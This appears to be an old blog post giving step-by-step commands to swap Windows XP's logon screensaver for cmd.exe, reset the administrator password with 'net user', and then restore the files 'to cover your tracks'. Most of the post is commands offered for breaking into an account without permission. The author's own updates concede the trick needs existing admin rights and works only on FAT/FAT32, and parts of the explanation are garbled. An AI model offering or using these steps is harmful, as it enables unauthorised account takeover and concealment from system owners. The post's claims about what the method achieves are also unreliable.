Windows XP Privilege Escalation Exploit
Sanju
Password .
1. Go to Start –> Run –> Type in CMD
2. You will get a command prompt. Enter these commands the way it
is given
3. cd\
4. cd\ windows\system32
5. mkdir temphack
6. copy logon.scr temphack\logon.scr
7. copy cmd.exe temphack\cmd.exe
8. del logon.scr
9. rename cmd.exe logon.scr
10. exit
Wait its not over read the rest to find out how to Hack the Window XP
Administrator Password
A Brief explanation of what you are currently doing here is
Your are nagivating to the windows system Directory where the system
files are stored. Next your creating a temporary directory called
mkdir. After which you are copying or backing up the logon.scr and
cmd.exe files into the mkdir then you are deleting the logon.scr file
and renaming cmd.exe file to logon.scr.
So basically you are telling windows is to backup the command program
and the screen saver file. Then we edited the settings so when windows
loads the screen saver, we will get an unprotected dos prompt without
logging in. When this appears enter this command
net user password
Example: If the admin user name is clazh and you want change the
password to pass Then type in the following command
net user clazh pass
This will chang the admin password to pass.
Thats it you have sucessfully hacked the Window XP Administrator
Password now you can Log in, using the hacked Window XP Administrator
Password and do whatever you want to do.
Here are the steps involved to De Hack or restore the Window XP
Administrator Password to cover your tracks.
1. Go to Start –> Run –> Type in CMD
2. You will get a command prompt. Enter these commands the way it
is given
3. cd\
4. cd\ windows\system32\temphack
5. copy logon.scr C:\windows\system32\logon.scr
6. copy cmd.exe C:\windows\system32\cmd.exe
7. exit
Or simply go to C:\windows\system32\temphack and copy the contents of
temphack back into system32 directory click Yes to overwrite the
modified files.
Note To administrators: You can block the entire password change thing
just a little tweak in the local security policy (control panel-
>administrative tools,works only for administrators group) will
disallow any change in password even if u r the Admin (u can put a
number of other restrictions too), but be cautious to give other users
limitted accounts. After you have done this, the above Screensaver
technique will fail.
Update: Christian Mohn points out The Above method is is possible only
if you have Local Administrator Privileges. My fault for not checking
it up before posting.
Update: The above Method only works if the system is FAT/FAT32 –
because of the updated “user rights management” in NTFS – file level
rights etc. This does not work on a system using NTFS.